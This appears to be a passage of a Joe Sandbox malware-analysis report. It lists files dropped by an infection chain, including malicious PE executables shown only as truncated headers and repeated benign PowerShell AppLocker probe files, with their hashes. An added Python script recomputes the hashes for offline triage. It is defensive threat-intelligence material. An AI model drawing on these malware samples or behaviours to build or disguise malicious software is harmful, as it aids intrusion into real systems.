SHA-256:EBAC10E74C49DC6B424AC678DCDD349D4291BEDAADDDCE1ABBC080E10B285BD9
SHA-512:F9DD3DBCDBD563E48AD059EF6CFE1BF3EA6E368F12A727B3BDC70883C11C4B02FD4EF0BC6A022815E778760557662CD1C8EDDAB7D91DED8C2EABEAE1FC5D7C5F
Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.......N...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...zrmackkh..*...$...)...$.............@...rcriyoua......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
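The entries above with identical hashes are all the same 60-byte marker that powershell.exe writes to the user's temp directory on startup (named __PSScriptPolicyTest_*.ps1 on a real host; the path is not shown here) to probe whether AppLocker is enforcing a lockdown policy. Every PowerShell instance the infection chain spawned, 32-bit and 64-bit alike, dropped its own copy, which is why the row repeats; the file is benign PowerShell noise and not attacker output, and the report marks it Malicious:false accordingly. The Python below is an added example, not code from Joe Sandbox: it recomputes the Size, Entropy (8bit), MD5, SHA1, SHA-256 and SHA-512 fields from a local copy so that any row in this table can be checked offline, and compares them with the values the report lists. Its input is constructed inline: the preview text with one trailing space, which is the form that reproduces the reported 60-byte size and the reported entropy (an assumption about the trailing byte, since the preview cannot show it).

```python
"""Recompute Joe Sandbox dropped-file metadata offline (added example)."""
import hashlib
import math
from collections import Counter
from typing import Dict

# Constructed input: PowerShell's AppLocker probe file, 59 visible characters
# plus one trailing space (assumed) to match the reported size of 60 bytes.
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report rows above for this file.
REPORTED = {
    "Size (bytes)": "60",
    "Entropy (8bit)": "4.038920595031593",
    "MD5": "D17FE0A3F47BE24A6453E9EF58C94641",
    "SHA1": "6AB83620379FC69F80C0242105DDFFD7D98D5D9D",
    "SHA-256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
    "SHA-512": "5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82",
}


def shannon_entropy(data: bytes) -> float:
    """Byte-level Shannon entropy in bits per byte (0.0 for empty, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metadata(data: bytes) -> Dict[str, str]:
    """Produce the same fields the report lists, formatted the way it prints them."""
    return {
        "Size (bytes)": str(len(data)),
        "Entropy (8bit)": repr(shannon_entropy(data)),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def compare_with_report(data: bytes, reported: Dict[str, str]) -> Dict[str, bool]:
    """Field-by-field agreement between a local file and the report's values.

    Entropy is compared after rounding to nine decimals: the sandbox's float
    formatting and the summation order here need not agree in the last digits.
    """
    computed = file_metadata(data)
    result: Dict[str, bool] = {}
    for field, want in reported.items():
        got = computed[field]
        if field == "Entropy (8bit)":
            result[field] = round(float(got), 9) == round(float(want), 9)
        else:
            result[field] = got.upper() == want.upper()
    return result


if __name__ == "__main__":
    for field, ok in compare_with_report(APPLOCKER_PROBE, REPORTED).items():
        print(f"{field:15} {'match' if ok else 'MISMATCH'}")
```

Swap APPLOCKER_PROBE for open(path, "rb").read() on a file recovered from a host to confirm it is the same artifact the sandbox saw; a hash mismatch on a file that should be static (such as this probe) is worth a second look, whereas a match on this particular file means it can be dropped from the triage list.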
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):284
                                                                                                                                                                                                                        Entropy (8bit):3.415343287993195
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:0/dwmnVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lbtWEt0:0/d5nRf2RKQ1CGAFAjzvYRQVb9t0
                                                                                                                                                                                                                        MD5:74472D9195FCC86C59B2B985CBEAD58D
                                                                                                                                                                                                                        SHA1:4EB026943C1ED73636A89A71D3B45020DF84F1D3
                                                                                                                                                                                                                        SHA-256:9C371F118D8169D7DEBE0245D315BD893133A64543D1E4F8A305105D97723F6F
                                                                                                                                                                                                                        SHA-512:D7410294AADCF2E16118A03A89D5FEAF9A61A0BD690EAA240764BDFBFF5D7B1D84170F2C5CE1CC93F9E8FFFBF54F7DDFFFB974E1066B54893E92E9E3B29C4000
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.....43M..@.......F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................1.@3P.........................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                        Entropy (8bit):7.989392691400588
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
                                                                                                                                                                                                                        MD5:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                        SHA1:5BDF461219E68AA7175A5FA01962AF8E3F583C7E
                                                                                                                                                                                                                        SHA-256:F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
                                                                                                                                                                                                                        SHA-512:BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg.............................$............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0... ......."..............@................P...2...0..............@............@...0...$...b..............@.............'..p......................@....data....P...P-..P...@..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (831)
